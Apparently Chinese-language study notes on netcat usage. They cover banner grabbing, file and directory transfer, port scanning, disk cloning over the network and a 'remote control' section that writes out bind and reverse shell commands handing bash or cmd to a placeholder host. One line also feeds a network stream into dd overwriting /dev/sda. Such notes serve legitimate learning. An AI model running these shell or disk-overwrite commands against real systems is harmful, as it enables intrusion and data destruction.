侦听/传输
nc -nv x.x.x.x port
-n 数字显示ip
-v 详细信息
前提:需要进行链接
可以获取banner信息
软件开发商,软件名称、版本、服务类型等信息,通过这些信息可以使用某些工具直接去使用相对应的exp去攻击
nc -lp port
-l 监听模式
-p 指定打开端口
传输文本
pc1: nc -lp port > xx.txt
重定向到txt文件
pc2: ls -l | nc -nv x.x.x.x port -q 1
将列出信息传输到pc1
-q 1 传输完成后1s退出
传输文件
P1: nc -lp port > xx.mp4
P2: nc -nv x.x.x.x port < xx.mp4 -q 1
P2传P1
or
P1: nc -lp port < xx.mp4
P2: nc -nv x.x.x.x port > xx.mp4 -q 1
P1传P2
传输目录
P1: tar -cvf - dir/ | nc -lp port -q 1
P2: nc -nv x.x.x.x port | tar -xvf -
传输加密文件
P1: nc -lp port | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > xx.mp4
P2: mcrypt --flush -Fbq -a rijndael-256 -m ecb < xx.mp4 | nc-nv x.x.x.x port -q 1
流媒体服务
P1: cat xx.mp4 | nc -lp port
P2: nc -nv x.x.x.x port | mplayer -vo xll -cache 3000 -
传输3000字节
端口扫描
nc -nvz x.x.x.x num-num 默认tcp连接
nc -nvzu x.x.x.x num-num udp连接
远程克隆硬盘
P1: nc -lp port | dd of=/dev/sda
P2: dd if=/dev/sda | nc -nv x.x.x.x port -q 1
p2 克隆到 p1
远程控制
P1: nc -lp port -c bash(linux)或cmd(windows) 服务端
P2: nc -nv x.x.x.x port 客户端
p2控p1
P1: nc -lp port
P2: nc -nv x.x.x.x port -c bash
P1控P2
netcat缺点:缺乏加密和身份验证的能力,可被嗅探